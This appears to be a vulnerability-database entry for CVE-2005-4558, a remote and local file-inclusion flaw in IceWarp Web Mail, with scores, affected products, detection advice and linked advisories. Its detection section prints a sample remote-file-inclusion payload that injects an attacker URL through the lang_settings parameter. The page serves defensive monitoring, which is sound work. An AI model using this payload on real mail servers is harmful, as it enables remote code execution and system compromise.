CVE-2005-4558
published 2005-12-28CVE-2005-4558: IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for…
PriorityP268medium6.5CVSS 2.0
AVNACLAuSCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
8.33%
94.2th percentile
IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deerfield | visnetic_mail_server | — | — |
| deerfield | visnetic_mail_server | — | — |
| icewarp | web_mail | — | — |
| icewarp | web_mail | — | — |
| merak | mail_server | — | — |
| merak | mail_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://example.com:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/;↗
- →Monitor HTTP requests to /mail/settings.html containing a manipulated 'language' parameter with non-standard values (e.g., URLs or path traversal strings) — indicative of LFI exploitation attempt. ↗
- →Monitor HTTP requests to /mail/index.html containing a 'lang_settings' parameter with array-style injection and semicolon-delimited remote URLs — indicative of RFI exploitation attempt. ↗
- →Alert on lang_settings parameter values containing semicolons and external URLs (e.g., lang_settings[TEST]=test;http://[host]/;) in web server logs targeting IceWarp/Merak/VisNetic mail installations. ↗
- →This vulnerability was confirmed actively exploited in the wild as of July 2007; prioritize detection on any IceWarp WebMail 5.5.1, Merak 8.3.0r, or VisNetic 8.3.0 build 1 deployments. ↗
- ·The vulnerability requires the attacker to be authenticated; unauthenticated exploitation is not directly described for the lang_settings/language parameter vectors. ↗
- ·The malicious language value is stored in a database before being executed, meaning the injection may persist and trigger on subsequent requests rather than immediately — detection must account for stored/second-order execution. ↗
CVSS provenance
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck6.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-q73x-2fc7-9qwp: IceWarp Web Mail 5
ghsa_unreviewed·2022-05-01
CVE-2005-4558 [MEDIUM] GHSA-q73x-2fc7-9qwp: IceWarp Web Mail 5
IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.
GHSA
GHSA-6fc2-x5pj-mq44: Absolute path directory traversal vulnerability in (1) MERAK Mail Server for Windows 8
ghsa_unreviewed·2022-05-01·CVSS 6.5
CVE-2006-0818 [MEDIUM] GHSA-6fc2-x5pj-mq44: Absolute path directory traversal vulnerability in (1) MERAK Mail Server for Windows 8
Absolute path directory traversal vulnerability in (1) MERAK Mail Server for Windows 8.3.8r with before IceWarp Web Mail 5.6.1 and (2) VisNetic MailServer before 8.5.0.5 allows remote authenticated users to include arbitrary files via a modified language parameter and a full Windows or UNC pathname in the lang_settings parameter to mail/index.html, which is not properly sanitized by the validatefolder PHP function, possibly due to an incomplete fix for CVE-2005-4558.
VulnCheck
deerfield visnetic_mail_server Vulnerability
vulncheck·2005·CVSS 6.5
CVE-2005-4558 [MEDIUM] deerfield visnetic_mail_server Vulnerability
IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.
Affected: deerfield visnetic_mail_server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.exploit-db.com/exploits/26982; https://www.exploit-db.com/exploits/26983
No detection rules found.
Exploit-DB
IceWarp Universal WebMail - '/mail/settings.html?Language' Local File Inclusion
exploitdb·2005-12-27
CVE-2005-4558 IceWarp Universal WebMail - '/mail/settings.html?Language' Local File Inclusion
IceWarp Universal WebMail - '/mail/settings.html?Language' Local File Inclusion
---
source: https://www.securityfocus.com/bid/16069/info
IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites.
An attacker can exploit these issues to include arbitrary local or remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Additionally, an attacker can exploit these issues to obtain the contents of local files.
Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by these issues.
UPDAT
Exploit-DB
IceWarp Universal WebMail - '/mail/index.html?lang_settings' Remote File Inclusion
exploitdb·2005-12-27
CVE-2005-4558 IceWarp Universal WebMail - '/mail/index.html?lang_settings' Remote File Inclusion
IceWarp Universal WebMail - '/mail/index.html?lang_settings' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/16069/info
IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites.
An attacker can exploit these issues to include arbitrary local or remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Additionally, an attacker can exploit these issues to obtain the contents of local files.
Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by these issues.
UP
No writeups or analysis indexed.
http://marc.info/?l=full-disclosure&m=113570229524828&w=2http://secunia.com/advisories/17046http://secunia.com/advisories/17865http://secunia.com/secunia_research/2005-62/advisory/http://securitytracker.com/id?1015412http://www.osvdb.org/22080http://www.osvdb.org/22081http://www.securityfocus.com/archive/1/420255/100/0/threadedhttp://www.securityfocus.com/bid/16069https://exchange.xforce.ibmcloud.com/vulnerabilities/23904http://marc.info/?l=full-disclosure&m=113570229524828&w=2http://secunia.com/advisories/17046http://secunia.com/advisories/17865http://secunia.com/secunia_research/2005-62/advisory/http://securitytracker.com/id?1015412http://www.osvdb.org/22080http://www.osvdb.org/22081http://www.securityfocus.com/archive/1/420255/100/0/threadedhttp://www.securityfocus.com/bid/16069https://exchange.xforce.ibmcloud.com/vulnerabilities/23904
2005-12-28
Published
Exploited in the wild